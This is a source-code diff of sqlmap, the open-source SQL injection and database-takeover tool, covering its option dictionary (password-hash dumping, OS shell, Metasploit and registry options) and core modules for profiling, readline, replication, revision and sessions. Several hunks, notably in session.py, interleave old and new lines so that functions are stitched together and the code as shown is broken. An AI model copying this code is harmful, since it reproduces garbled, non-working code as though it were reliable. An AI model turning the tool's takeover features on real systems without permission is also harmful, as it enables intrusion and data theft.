                               "authFile":          "string",
                               "proxy":             "string",
-                               "threads":           "integer",
+                               "proxyCred":         "string",
                               "proxyFile":         "string",
                               "ignoreProxy":       "boolean",
                               "tor":               "boolean",
                               "torPort":           "integer",
                               "torType":           "string",
                               "checkTor":          "boolean",
                               "delay":             "float",
                               "timeout":           "float",
                               "retries":           "integer",
                               "rParam":            "string",
                               "safeUrl":           "string",
                               "safePost":          "string",
                               "safeReqFile":       "string",
                               "safeFreq":          "integer",
                               "skipUrlEncode":     "boolean",
                               "csrfToken":         "string",
                               "csrfUrl":           "string",
                               "forceSSL":          "boolean",
                               "hpp":               "boolean",
                               "evalCode":          "string",
                             },
            "Optimization":  {
                               "optimize":          "boolean",
                               "predictOutput":     "boolean",
                               "keepAlive":         "boolean",
                               "nullConnection":    "boolean",
                               "threads":           "integer",
                             },
            "Injection":     {
                               "testParameter":     "string",
                               "skip":              "string",
                               "skipStatic":        "boolean",
                               "dbms":              "string",
                               "dbmsCred":          "string",
                               "os":                "string",
                               "invalidBignum":     "boolean",
                               "invalidLogical":    "boolean",
                               "invalidString":     "boolean",
                               "noCast":            "boolean",
                               "noEscape":          "boolean",
                               "prefix":            "string",
-                               "postfix":           "string",
+                               "suffix":            "string",
                               "tamper":            "string",
                             },
            "Detection":     {
                               "level":             "integer",
                               "risk":              "integer",
                               "string":            "string",
                               "notString":         "string",
                               "regexp":            "string",
-                               "eString":           "string",
+                               "code":              "integer",
-                               "eRegexp":           "string",
+                               "textOnly":          "boolean",
                               "titles":            "boolean",
                             },
            "Techniques":    {
-                               "stackedTest":       "boolean",
+                               "tech":              "string",
-                               "timeTest":          "boolean",
+                               "timeSec":           "integer",
-                               "unionTest":         "boolean",
+                               "uCols":             "string",
-                               "unionUse":          "boolean",
+                               "uChar":             "string",
                               "uFrom":             "string",
                               "dnsName":           "string",
                               "secondOrder":       "string",
                             },
            "Fingerprint":   {
@@ -71,43 +113,131 @@ optDict = {
                             },
            "Enumeration":   {
-                               "getBanner":         "boolean",
+                               "getAll":            "boolean",
-                               "getCurrentUser":    "boolean",
+                               "getBanner":         ("boolean", "Banners"),
-                               "getCurrentDb":      "boolean",
+                               "getCurrentUser":    ("boolean", "Users"),
                               "getCurrentDb":      ("boolean", "Databases"),
                               "getHostname":       "boolean",
                               "isDba":             "boolean",
-                               "getUsers":          "boolean",
+                               "getUsers":          ("boolean", "Users"),
-                               "getPasswordHashes": "boolean",
+                               "getPasswordHashes": ("boolean", "Passwords"),
-                               "getPrivileges":     "boolean",
+                               "getPrivileges":     ("boolean", "Privileges"),
-                               "getDbs":            "boolean",
+                               "getRoles":          ("boolean", "Roles"),
-                               "getTables":         "boolean",
+                               "getDbs":            ("boolean", "Databases"),
-                               "getColumns":        "boolean",
+                               "getTables":         ("boolean", "Tables"),
                               "getColumns":        ("boolean", "Columns"),
                               "getSchema":         "boolean",
                               "getCount":          "boolean",
                               "dumpTable":         "boolean",
                               "dumpAll":           "boolean",
-                               "user":              "string",
+                               "search":            "boolean",
                               "getComments":       "boolean",
                               "db":                "string",
                               "tbl":               "string",
                               "col":               "string",
                               "excludeCol":        "string",
                               "pivotColumn":       "string",
                               "dumpWhere":         "string",
                               "user":              "string",
                               "excludeSysDbs":     "boolean",
                               "limitStart":        "integer",
                               "limitStop":         "integer",
                               "firstChar":         "integer",
                               "lastChar":          "integer",
                               "query":             "string",
                               "sqlShell":          "boolean",
                               "sqlFile":           "string",
                             },
            "Brute":         {
                               "commonTables":       "boolean",
                               "commonColumns":      "boolean",
                             },
            "User-defined function": {
                               "udfInject":         "boolean",
                               "shLib":             "string",
                             },
            "File system":   {
                               "rFile":             "string",
                               "wFile":             "string",
                               "dFile":             "string",
                             },
            "Takeover":      {
                               "osCmd":             "string",
                               "osShell":           "boolean",
                               "osPwn":             "boolean",
                               "osSmb":             "boolean",
                               "osBof":             "boolean",
                               "privEsc":           "boolean",
                               "msfPath":           "string",
                               "tmpPath":           "string",
                             },
            "Windows":       {
                               "regRead":           "boolean",
                               "regAdd":            "boolean",
                               "regDel":            "boolean",
                               "regKey":            "string",
                               "regVal":            "string",
                               "regData":           "string",
                               "regType":           "string",
                             },
            "General":       {
                               #"xmlFile":           "string",
                               "trafficFile":       "string",
                               "batch":             "boolean",
                               "binaryFields":      "string",
                               "charset":           "string",
                               "crawlDepth":        "integer",
                               "crawlExclude":      "string",
                               "csvDel":            "string",
                               "dumpFormat":        "string",
                               "eta":               "boolean",
                               "flushSession":      "boolean",
                               "forms":             "boolean",
                               "freshQueries":      "boolean",
                               "hexConvert":        "boolean",
                               "outputDir":         "string",
                               "parseErrors":       "boolean",
                               "saveConfig":        "string",
                               "scope":             "string",
                               "testFilter":        "string",
                               "testSkip":          "string",
                               "updateAll":         "boolean",
                             },
            "Miscellaneous": {
-                               "eta":               "boolean",
+                               "alert":             "string",
                               "answers":           "string",
                               "beep":              "boolean",
                               "cleanup":           "boolean",
                               "dependencies":      "boolean",
                               "disableColoring":   "boolean",
                               "googlePage":        "integer",
                               "identifyWaf":       "boolean",
                               "mobile":            "boolean",
                               "offline":           "boolean",
                               "pageRank":          "boolean",
                               "purgeOutput":       "boolean",
                               "skipWaf":           "boolean",
                               "smart":             "boolean",
                               "tmpDir":            "string",
                               "wizard":            "boolean",
                               "verbose":           "integer",
                               "updateAll":         "boolean",
                               "sessionFile":       "string",
                               "batch":             "boolean",
                             },
            "Hidden": {
                               "dummy":             "boolean",
                               "disablePrecon":     "boolean",
                               "profile":           "boolean",
                               "forceDns":          "boolean",
                               "ignore401":         "boolean",
                               "smokeTest":         "boolean",
                               "liveTest":          "boolean",
                               "stopFail":          "boolean",
                               "runCase":           "string",
                      }
          }
--- a/lib/core/profiling.py
+++ b/lib/core/profiling.py
@@ -0,0 +1,89 @@
 #!/usr/bin/env python
 """
 Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 import codecs
 import os
 import cProfile
 from lib.core.common import getUnicode
 from lib.core.data import logger
 from lib.core.data import paths
 from lib.core.settings import UNICODE_ENCODING
 def profile(profileOutputFile=None, dotOutputFile=None, imageOutputFile=None):
    """
    This will run the program and present profiling data in a nice looking graph
    """
    try:
        from thirdparty.gprof2dot import gprof2dot
        from thirdparty.xdot import xdot
        import gobject
        import gtk
        import pydot
    except ImportError, e:
        errMsg = "profiling requires third-party libraries ('%s') " % getUnicode(e, UNICODE_ENCODING)
        errMsg += "(Hint: 'sudo apt-get install python-pydot python-pyparsing python-profiler graphviz')"
        logger.error(errMsg)
        return
    if profileOutputFile is None:
        profileOutputFile = os.path.join(paths.SQLMAP_OUTPUT_PATH, "sqlmap_profile.raw")
    if dotOutputFile is None:
        dotOutputFile = os.path.join(paths.SQLMAP_OUTPUT_PATH, "sqlmap_profile.dot")
    if imageOutputFile is None:
        imageOutputFile = os.path.join(paths.SQLMAP_OUTPUT_PATH, "sqlmap_profile.png")
    if os.path.exists(profileOutputFile):
        os.remove(profileOutputFile)
    if os.path.exists(dotOutputFile):
        os.remove(dotOutputFile)
    if os.path.exists(imageOutputFile):
        os.remove(imageOutputFile)
    infoMsg = "profiling the execution into file %s" % profileOutputFile
    logger.info(infoMsg)
    # Start sqlmap main function and generate a raw profile file
    cProfile.run("start()", profileOutputFile)
    infoMsg = "converting profile data into a dot file '%s'" % dotOutputFile
    logger.info(infoMsg)
    # Create dot file by using extra/gprof2dot/gprof2dot.py
    # http://code.google.com/p/jrfonseca/wiki/Gprof2Dot
    dotFilePointer = codecs.open(dotOutputFile, 'wt', UNICODE_ENCODING)
    parser = gprof2dot.PstatsParser(profileOutputFile)
    profile = parser.parse()
    profile.prune(0.5 / 100.0, 0.1 / 100.0)
    dot = gprof2dot.DotWriter(dotFilePointer)
    dot.graph(profile, gprof2dot.TEMPERATURE_COLORMAP)
    dotFilePointer.close()
    infoMsg = "converting dot file into a graph image '%s'" % imageOutputFile
    logger.info(infoMsg)
    # Create graph image (png) by using pydot (python-pydot)
    # http://code.google.com/p/pydot/
    pydotGraph = pydot.graph_from_dot_file(dotOutputFile)
    pydotGraph.write_png(imageOutputFile)
    infoMsg = "displaying interactive graph with xdot library"
    logger.info(infoMsg)
    # Display interactive Graphviz dot file by using extra/xdot/xdot.py
    # http://code.google.com/p/jrfonseca/wiki/XDot
    win = xdot.DotWindow()
    win.connect('destroy', gtk.main_quit)
    win.set_filter("dot")
    win.open_file(dotOutputFile)
    gtk.main()
--- a/lib/core/progress.py
+++ b/lib/core/progress.py
@@ -1,111 +0,0 @@
 #!/usr/bin/env python
 """
 $Id$
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
                        and Daniele Bellucci <daniele.bellucci@gmail.com>
 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 Software Foundation version 2 of the License.
 sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
 WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
 FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
 details.
 You should have received a copy of the GNU General Public License along
 with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 from lib.core.common import dataToStdout
 class ProgressBar:
    """
    This class defines methods to update and draw a progress bar
    """
    def __init__(self, minValue=0, maxValue=10, totalWidth=54):
        self.__progBar = "[]"
        self.__oldProgBar = ""
        self.__min = int(minValue)
        self.__max = int(maxValue)
        self.__span = self.__max - self.__min
        self.__width = totalWidth
        self.__amount = 0
        self.update()
    def __convertSeconds(self, value):
        seconds = value
        minutes = seconds / 60
        seconds = seconds - (minutes * 60)
        return "%.2d:%.2d" % (minutes, seconds)
    def update(self, newAmount=0):
        """
        This method updates the progress bar
        """
        if newAmount < self.__min:
            newAmount = self.__min
        elif newAmount > self.__max:
            newAmount = self.__max
        self.__amount = newAmount
        # Figure out the new percent done, round to an integer
        diffFromMin = float(self.__amount - self.__min)
        percentDone = (diffFromMin / float(self.__span)) * 100.0
        percentDone = round(percentDone)
        percentDone = int(percentDone)
        # Figure out how many hash bars the percentage should be
        allFull = self.__width - 2
        numHashes = (percentDone / 100.0) * allFull
        numHashes = int(round(numHashes))
        # Build a progress bar with an arrow of equal signs
        if numHashes == 0:
            self.__progBar = "[>%s]" % (" " * (allFull - 1))
        elif numHashes == allFull:
            self.__progBar = "[%s]" % ("=" * allFull)
        else:
            self.__progBar = "[%s>%s]" % ("=" * (numHashes - 1),
                                          " " * (allFull - numHashes))
        # Add the percentage at the beginning of the progress bar
        percentString = str(percentDone) + "%"
        self.__progBar = "%s %s" % (percentString, self.__progBar)
    def draw(self, eta=0):
        """
        This method draws the progress bar if it has changed
        """
        if self.__progBar != self.__oldProgBar:
            self.__oldProgBar = self.__progBar
            if eta and self.__amount < self.__max:
                dataToStdout("\r%s %d/%d  ETA %s" % (self.__progBar, self.__amount, self.__max, self.__convertSeconds(int(eta))))
            else:
                blank = " " * (80 - len("\r%s %d/%d" % (self.__progBar, self.__amount, self.__max)))
                dataToStdout("\r%s %d/%d%s" % (self.__progBar, self.__amount, self.__max, blank))
    def __str__(self):
        """
        This method returns the progress bar string
        """
        return str(self.__progBar)
--- a/lib/core/readlineng.py
+++ b/lib/core/readlineng.py
@@ -1,76 +1,48 @@
 #!/usr/bin/env python
 """
-$Id$
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
-
+See the file 'doc/COPYING' for copying permission
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
                        and Daniele Bellucci <daniele.bellucci@gmail.com>
 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 Software Foundation version 2 of the License.
 sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
 WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
 FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
 details.
 You should have received a copy of the GNU General Public License along
 with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 Based on IPython readline library (IPython/rlineimpl.py), imports and
 provides the "correct" version of readline for the platform.
 In addition to normal readline stuff, this module provides haveReadline
 boolean and _outputfile variable used in genutils.
 """
 import sys
 from lib.core.data import logger
 from lib.core.settings import IS_WIN
 from lib.core.settings import PLATFORM
 _readline = None
 try:
    from readline import *
-    import readline as _rl
+    import readline as _readline
    haveReadline = True
 except ImportError:
    try:
        from pyreadline import *
-        import pyreadline as _rl
+        import pyreadline as _readline
        haveReadline = True
    except ImportError:
-        haveReadline = False
+        pass
-if sys.platform == 'win32' and haveReadline:
+if IS_WIN and _readline:
    try:
-        _outputfile=_rl.GetOutputFile()
+        _outputfile = _readline.GetOutputFile()
    except AttributeError:
        debugMsg = "Failed GetOutputFile when using platform's "
        debugMsg += "readline library"
        logger.debug(debugMsg)
-        haveReadline = False
+        _readline = None
 # Test to see if libedit is being used instead of GNU readline.
 # Thanks to Boyd Waters for this patch.
 uses_libedit = False
-if sys.platform == 'darwin' and haveReadline:
+if PLATFORM == 'mac' and _readline:
    import commands
-    (status, result) = commands.getstatusoutput( "otool -L %s | grep libedit" % _rl.__file__ )
+    (status, result) = commands.getstatusoutput("otool -L %s | grep libedit" % _readline.__file__)
    if status == 0 and len(result) > 0:
        # We are bound to libedit - new in Leopard
-        _rl.parse_and_bind("bind ^I rl_complete")
+        _readline.parse_and_bind("bind ^I rl_complete")
        debugMsg = "Leopard libedit detected when using platform's "
        debugMsg += "readline library"
@@ -78,17 +50,16 @@ if sys.platform == 'darwin' and haveReadline:
        uses_libedit = True
 # the clear_history() function was only introduced in Python 2.4 and is
 # actually optional in the readline API, so we must explicitly check for its
 # existence.  Some known platforms actually don't have it.  This thread:
 # http://mail.python.org/pipermail/python-dev/2003-August/037845.html
 # has the original discussion.
-if haveReadline:
+if _readline:
    try:
-        _rl.clear_history
+        _readline.clear_history()
    except AttributeError:
        def clear_history():
            pass
-        _rl.clear_history = clear_history
+        _readline.clear_history = clear_history
--- a/lib/core/replication.py
+++ b/lib/core/replication.py
@@ -0,0 +1,119 @@
 #!/usr/bin/env python
 """
 Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 import sqlite3
 from extra.safe2bin.safe2bin import safechardecode
 from lib.core.common import getSafeExString
 from lib.core.common import unsafeSQLIdentificatorNaming
 from lib.core.exception import SqlmapGenericException
 from lib.core.exception import SqlmapValueException
 from lib.core.settings import UNICODE_ENCODING
 class Replication(object):
    """
    This class holds all methods/classes used for database
    replication purposes.
    """
    def __init__(self, dbpath):
        self.dbpath = dbpath
        self.connection = sqlite3.connect(dbpath)
        self.connection.isolation_level = None
        self.cursor = self.connection.cursor()
    class DataType:
        """
        Using this class we define auxiliary objects
        used for representing sqlite data types.
        """
        def __init__(self, name):
            self.name = name
        def __str__(self):
            return self.name
        def __repr__(self):
            return "<DataType: %s>" % self
    class Table:
        """
        This class defines methods used to manipulate table objects.
        """
        def __init__(self, parent, name, columns=None, create=True, typeless=False):
            self.parent = parent
            self.name = unsafeSQLIdentificatorNaming(name)
            self.columns = columns
            if create:
                try:
                    self.execute('DROP TABLE IF EXISTS "%s"' % self.name)
                    if not typeless:
                        self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s" %s' % (unsafeSQLIdentificatorNaming(colname), coltype) for colname, coltype in self.columns)))
                    else:
                        self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s"' % unsafeSQLIdentificatorNaming(colname) for colname in self.columns)))
                except Exception, ex:
                    errMsg = "problem occurred ('%s') while initializing the sqlite database " % getSafeExString(ex, UNICODE_ENCODING)
                    errMsg += "located at '%s'" % self.parent.dbpath
                    raise SqlmapGenericException(errMsg)
        def insert(self, values):
            """
            This function is used for inserting row(s) into current table.
            """
            if len(values) == len(self.columns):
                self.execute('INSERT INTO "%s" VALUES (%s)' % (self.name, ','.join(['?'] * len(values))), safechardecode(values))
            else:
                errMsg = "wrong number of columns used in replicating insert"
                raise SqlmapValueException(errMsg)
        def execute(self, sql, parameters=[]):
            try:
                self.parent.cursor.execute(sql, parameters)
            except sqlite3.OperationalError, ex:
                errMsg = "problem occurred ('%s') while accessing sqlite database " % getSafeExString(ex, UNICODE_ENCODING)
                errMsg += "located at '%s'. Please make sure that " % self.parent.dbpath
                errMsg += "it's not used by some other program"
                raise SqlmapGenericException(errMsg)
        def beginTransaction(self):
            """
            Great speed improvement can be gained by using explicit transactions around multiple inserts.
            Reference: http://stackoverflow.com/questions/4719836/python-and-sqlite3-adding-thousands-of-rows
            """
            self.execute('BEGIN TRANSACTION')
        def endTransaction(self):
            self.execute('END TRANSACTION')
        def select(self, condition=None):
            """
            This function is used for selecting row(s) from current table.
            """
            _ = 'SELECT * FROM %s' % self.name
            if condition:
                _ += 'WHERE %s' % condition
            return self.execute(_)
    def createTable(self, tblname, columns=None, typeless=False):
        """
        This function creates Table instance with current connection settings.
        """
        return Replication.Table(parent=self, name=tblname, columns=columns, typeless=typeless)
    def __del__(self):
        self.cursor.close()
        self.connection.close()
    # sqlite data types
    NULL = DataType('NULL')
    INTEGER = DataType('INTEGER')
    REAL = DataType('REAL')
    TEXT = DataType('TEXT')
    BLOB = DataType('BLOB')
--- a/lib/core/revision.py
+++ b/lib/core/revision.py
@@ -0,0 +1,54 @@
 #!/usr/bin/env python
 """
 Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 import os
 import re
 from subprocess import PIPE
 from subprocess import Popen as execute
 def getRevisionNumber():
    """
    Returns abbreviated commit hash number as retrieved with "git rev-parse --short HEAD"
    """
    retVal = None
    filePath = None
    _ = os.path.dirname(__file__)
    while True:
        filePath = os.path.join(_, ".git", "HEAD")
        if os.path.exists(filePath):
            break
        else:
            filePath = None
            if _ == os.path.dirname(_):
                break
            else:
                _ = os.path.dirname(_)
    while True:
        if filePath and os.path.isfile(filePath):
            with open(filePath, "r") as f:
                content = f.read()
                filePath = None
                if content.startswith("ref: "):
                    filePath = os.path.join(_, ".git", content.replace("ref: ", "")).strip()
                else:
                    match = re.match(r"(?i)[0-9a-f]{32}", content)
                    retVal = match.group(0) if match else None
                    break
        else:
            break
    if not retVal:
        process = execute("git rev-parse --verify HEAD", shell=True, stdout=PIPE, stderr=PIPE)
        stdout, _ = process.communicate()
        match = re.search(r"(?i)[0-9a-f]{32}", stdout or "")
        retVal = match.group(0) if match else None
    return retVal[:7] if retVal else None
--- a/lib/core/session.py
+++ b/lib/core/session.py
@@ -1,108 +1,21 @@
 #!/usr/bin/env python
 """
-$Id$
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
-
+See the file 'doc/COPYING' for copying permission
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
                        and Daniele Bellucci <daniele.bellucci@gmail.com>
 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 Software Foundation version 2 of the License.
 sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
 WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
 FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
 details.
 You should have received a copy of the GNU General Public License along
 with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 import re
-from lib.core.common import dataToSessionFile
+from lib.core.common import aliasToDbmsEnum
-from lib.core.common import readInput
+from lib.core.common import Backend
-from lib.core.data import conf
+from lib.core.common import Format
 from lib.core.common import hashDBWrite
 from lib.core.data import kb
 from lib.core.data import logger
-from lib.core.settings import MSSQL_ALIASES
+from lib.core.enums import HASHDB_KEYS
-from lib.core.settings import MYSQL_ALIASES
+from lib.core.enums import OS
-
+from lib.core.settings import SUPPORTED_DBMS
 def setString():
    """
    Save string to match in session file.
    """
    condition = (
                  not kb.resumedQueries or ( kb.resumedQueries.has_key(conf.url) and
                  not kb.resumedQueries[conf.url].has_key("String") )
                )
    if condition:
        dataToSessionFile("[%s][None][None][String][%s]\n" % (conf.url, conf.string))
 def setRegexp():
    """
    Save regular expression to match in session file.
    """
    condition = (
                  not kb.resumedQueries or ( kb.resumedQueries.has_key(conf.url) and
                  not kb.resumedQueries[conf.url].has_key("Regular expression") )
                )
    if condition:
        dataToSessionFile("[%s][None][None][Regular expression][%s]\n" % (conf.url, conf.regexp))
 def setInjection():
    """
    Save information retrieved about injection place and parameter in the
    session file.
    """
    if kb.injPlace == "User-Agent":
        kb.injParameter = conf.agent
    condition = (
                  kb.injPlace and kb.injParameter and ( not kb.resumedQueries
                  or ( kb.resumedQueries.has_key(conf.url) and
                  ( not kb.resumedQueries[conf.url].has_key("Injection point") 
                  or not kb.resumedQueries[conf.url].has_key("Injection parameter")
                  or not kb.resumedQueries[conf.url].has_key("Injection type")
                  ) ) )
                )
    if condition:
        dataToSessionFile("[%s][%s][%s][Injection point][%s]\n" % (conf.url, kb.injPlace, conf.parameters[kb.injPlace], kb.injPlace))
        dataToSessionFile("[%s][%s][%s][Injection parameter][%s]\n" % (conf.url, kb.injPlace, conf.parameters[kb.injPlace], kb.injParameter))
        dataToSessionFile("[%s][%s][%s][Injection type][%s]\n" % (conf.url, kb.injPlace, conf.parameters[kb.injPlace], kb.injType))
 def setParenthesis(parenthesisCount):
    """
    @param parenthesisCount: number of parenthesis to be set into the
    knowledge base as fingerprint.
    @type parenthesisCount: C{int}
    """
    condition = (
                  not kb.resumedQueries or ( kb.resumedQueries.has_key(conf.url) and
                  not kb.resumedQueries[conf.url].has_key("Parenthesis") )
                )
    if condition:
        dataToSessionFile("[%s][%s][%s][Parenthesis][%s]\n" % (conf.url, kb.injPlace, conf.parameters[kb.injPlace], parenthesisCount))
    kb.parenthesis = parenthesisCount
 def setDbms(dbms):
    """
@@ -111,203 +24,57 @@ def setDbms(dbms):
    @type dbms: C{str}
    """
-    condition = (
+    hashDBWrite(HASHDB_KEYS.DBMS, dbms)
                  not kb.resumedQueries
                  or ( kb.resumedQueries.has_key(conf.url) and
                  not kb.resumedQueries[conf.url].has_key("DBMS") )
                )
-    if condition:
+    _ = "(%s)" % ("|".join([alias for alias in SUPPORTED_DBMS]))
-        dataToSessionFile("[%s][%s][%s][DBMS][%s]\n" % (conf.url, kb.injPlace, conf.parameters[kb.injPlace], dbms))
+    _ = re.search(r"\A%s( |\Z)" % _, dbms, re.I)
-    firstRegExp = "(%s|%s)" % ("|".join([alias for alias in MSSQL_ALIASES]),
+    if _:
-                               "|".join([alias for alias in MYSQL_ALIASES]))
+        dbms = _.group(1)
    dbmsRegExp = re.search("^%s" % firstRegExp, dbms, re.I)
-    if dbmsRegExp:
+    Backend.setDbms(dbms)
-        dbms = dbmsRegExp.group(1)
+    if kb.resolutionDbms:
        hashDBWrite(HASHDB_KEYS.DBMS, kb.resolutionDbms)
-    kb.dbms = dbms
+    logger.info("the back-end DBMS is %s" % Backend.getDbms())
-
+def setOs():
 def setUnion(comment=None, count=None, position=None):
    """
-    @param comment: union comment to save in session file
+    Example of kb.bannerFp dictionary:
    @type comment: C{str}
-    @param count: union count to save in session file
+    {
-    @type count: C{str}
+      'sp': set(['Service Pack 4']),
-
+      'dbmsVersion': '8.00.194',
-    @param position: union position to save in session file
+      'dbmsServicePack': '0',
-    @type position: C{str}
+      'distrib': set(['2000']),
      'dbmsRelease': '2000',
      'type': set(['Windows'])
    }
    """
-    if comment and count:
+    infoMsg = ""
        condition = (
                      not kb.resumedQueries or ( kb.resumedQueries.has_key(conf.url) and
                      ( not kb.resumedQueries[conf.url].has_key("Union comment") 
                      or not kb.resumedQueries[conf.url].has_key("Union count")
                      ) )
                    )
-        if condition:
+    if not kb.bannerFp:
-            dataToSessionFile("[%s][%s][%s][Union comment][%s]\n" % (conf.url, kb.injPlace, conf.parameters[kb.injPlace], comment))
+        return
            dataToSessionFile("[%s][%s][%s][Union count][%s]\n" % (conf.url, kb.injPlace, conf.parameters[kb.injPlace], count))
-        kb.unionComment = comment
+    if "type" in kb.bannerFp:
-        kb.unionCount = count
+        Backend.setOs(Format.humanize(kb.bannerFp["type"]))
        infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs()
-    elif position:
+    if "distrib" in kb.bannerFp:
-        condition = (
+        kb.osVersion = Format.humanize(kb.bannerFp["distrib"])
-                      not kb.resumedQueries or ( kb.resumedQueries.has_key(conf.url) and
+        infoMsg += " %s" % kb.osVersion
                      ( not kb.resumedQueries[conf.url].has_key("Union position")
                      ) )
                    )
-        if condition:
+    if "sp" in kb.bannerFp:
-            dataToSessionFile("[%s][%s][%s][Union position][%s]\n" % (conf.url, kb.injPlace, conf.parameters[kb.injPlace], position))
+        kb.osSP = int(Format.humanize(kb.bannerFp["sp"]).replace("Service Pack ", ""))
-        kb.unionPosition = position
+    elif "sp" not in kb.bannerFp and Backend.isOs(OS.WINDOWS):
        kb.osSP = 0
    if Backend.getOs() and kb.osVersion and kb.osSP:
        infoMsg += " Service Pack %d" % kb.osSP
-def resumeConfKb(expression, url, value):
+    if infoMsg:
-    if expression == "String" and url == conf.url:
+        logger.info(infoMsg)
        string = value[:-1]
-        logMsg  = "resuming string match '%s' from session file" % string
+    hashDBWrite(HASHDB_KEYS.OS, Backend.getOs())
        logger.info(logMsg)
        if string and ( not conf.string or string != conf.string ):
            if not conf.string:
                message = "you did not provide any string to match. "
            else:
                message  = "The string you provided does not match "
                message += "the resumed string. "
            message += "Do you want to use the resumed string "
            message += "to be matched in page when the query "
            message += "is valid? [Y/n] "
            test = readInput(message, default="Y")
            if not test or test[0] in ("y", "Y"):
                conf.string = string
    elif expression == "Regular expression" and url == conf.url:
        regexp = value[:-1]
        logMsg  = "resuming regular expression match '%s' from session file" % regexp
        logger.info(logMsg)
        if regexp and ( not conf.regexp or regexp != conf.regexp ):
            if not conf.regexp:
                message  = "you did not provide any regular expression "
                message += "to match. "
            else:
                message  = "The regular expression you provided does not "
                message += "match the resumed regular expression. "
            message += "Do you want to use the resumed regular expression "
            message += "to be matched in page when the query "
            message += "is valid? [Y/n] "
            test = readInput(message, default="Y")
            if not test or test[0] in ("y", "Y"):
                conf.regexp = regexp
    elif expression == "Injection point" and url == conf.url:
        injPlace = value[:-1]
        logMsg  = "resuming injection point '%s' from session file" % injPlace
        logger.info(logMsg)
        if not conf.paramDict.has_key(injPlace):
            warnMsg  = "none of the parameters you provided "
            warnMsg += "matches the resumable injection point. "
            warnMsg += "sqlmap is going to reidentify the "
            warnMsg += "injectable point"
            logger.warn(warnMsg)
        else:
            kb.injPlace = injPlace
    elif expression == "Injection parameter" and url == conf.url:
        injParameter = value[:-1]
        logMsg  = "resuming injection parameter '%s' from session file" % injParameter
        logger.info(logMsg)
        condition = (
                      not conf.paramDict.has_key(kb.injPlace) or
                      not conf.paramDict[kb.injPlace].has_key(injParameter)
                    )
        if condition:
            warnMsg  = "none of the parameters you provided "
            warnMsg += "matches the resumable injection parameter. "
            warnMsg += "sqlmap is going to reidentify the "
            warnMsg += "injectable point"
            logger.warn(warnMsg)
        else:
            kb.injParameter = injParameter
    elif expression == "Injection type" and url == conf.url:
        kb.injType = value[:-1]
        logMsg  = "resuming injection type '%s' from session file" % kb.injType
        logger.info(logMsg)
    elif expression == "Parenthesis" and url == conf.url:
        kb.parenthesis = int(value[:-1])
        logMsg  = "resuming %d number of " % kb.parenthesis
        logMsg += "parenthesis from session file"
        logger.info(logMsg)
    elif expression == "DBMS" and url == conf.url:
        dbms = value[:-1]
        logMsg  = "resuming back-end DBMS '%s' " % dbms
        logMsg += "from session file"
        logger.info(logMsg)
        dbms = dbms.lower()
        firstRegExp = "(%s|%s)" % ("|".join([alias for alias in MSSQL_ALIASES]),
                                   "|".join([alias for alias in MYSQL_ALIASES]))
        dbmsRegExp = re.search("%s ([\d\.]+)" % firstRegExp, dbms)
        if dbmsRegExp:
            dbms = dbmsRegExp.group(1)
            kb.dbmsVersion = [dbmsRegExp.group(2)]
        if conf.dbms and conf.dbms.lower() != dbms:
            message  = "you provided '%s' as back-end DBMS, " % conf.dbms
            message += "but from a past scan information on the target URL "
            message += "sqlmap assumes the back-end DBMS is %s. " % dbms
            message += "Do you really want to force the back-end "
            message += "DBMS value? [y/N] "
            test = readInput(message, default="N")
            if not test or test[0] in ("n", "N"):
                conf.dbms = dbms
        else:
            conf.dbms = dbms
    elif expression == "Union comment" and url == conf.url:
        kb.unionComment = value[:-1]
        logMsg  = "resuming union comment "
        logMsg += "'%s' from session file" % kb.unionComment
        logger.info(logMsg)
    elif expression == "Union count" and url == conf.url:
        kb.unionCount = int(value[:-1])
        logMsg  = "resuming union count "
        logMsg += "%s from session file" % kb.unionCount
        logger.info(logMsg)
    elif expression == "Union position" and url == conf.url:
        kb.unionPosition = int(value[:-1])
        logMsg  = "resuming union position "
        logMsg += "%s from session file" % kb.unionPosition
        logger.info(logMsg)
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -1,70 +1,727 @@
 #!/usr/bin/env python
 """
-$Id$
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
-
+See the file 'doc/COPYING' for copying permission
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
                        and Daniele Bellucci <daniele.bellucci@gmail.com>
 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 Software Foundation version 2 of the License.
